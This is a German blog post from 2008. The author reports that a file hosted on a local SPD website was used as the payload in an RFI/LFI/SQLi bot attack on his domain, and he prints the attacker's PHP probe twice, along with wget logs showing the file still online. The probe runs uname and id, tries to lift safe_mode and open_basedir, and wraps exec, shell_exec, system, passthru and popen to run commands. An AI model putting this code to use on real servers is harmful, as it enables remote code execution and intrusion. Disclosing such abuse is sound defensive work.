Damit mir nicht jemand vorwirft ich sei politisch,
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)
http://spd-esens.de/spd/contentimage/bid.txt
Oder ist sowas nur interessant, wenn es beim jährlichen CCC Treffen passiert?
CODE:
<?php
echo "549821347819481<br />";
//VaRiaBiLi Di SiSTeMa
$uname = @php_uname();
//eCHo
echo "uname -a: $uname<br />";
//SAFE OFF
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0)
{
echo("uid=");
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
?>
...mal sehen wielange es dauert bis die Datei entfernt wird.
UPDATE: ...noch nicht entfernt
CODE:
Thu Oct 16 19:48:23 CEST 2008
--19:48:23-- http://spd-esens.de/spd/contentimage/bid.txt
=> `bid.txt'
Resolving spd-esens.de... 87.238.199.52
Connecting to spd-esens.de|87.238.199.52|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,360 (1.3K) [text/plain]
100%[==================================================================================================================>] 1,360 --.--K/s
19:48:24 (41.84 MB/s) - `bid.txt' saved [1360/1360]
oO
UPDATE: 27. Oktober 7:40
...und immernoch da:
CODE:
Mon Oct 27 07:42:07 CET 2008
--07:42:07-- http://spd-esens.de/spd/contentimage/bid.txt
=> `bid.txt'
Resolving spd-esens.de... 87.238.199.52
Connecting to spd-esens.de|87.238.199.52|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,360 (1.3K) [text/plain]
100%[==================================================================================================================>] 1,360 --.--K/s
07:42:07 (40.53 MB/s) - `bid.txt' saved [1360/1360]
<?php
echo "549821347819481<br />";
//VaRiaBiLi Di SiSTeMa
$uname = @php_uname();
//eCHo
echo "uname -a: $uname<br />";
//SAFE OFF
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0)
{
echo("uid=");
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
?>
...keine Idee, was der Ortsverband sich dabei denkt.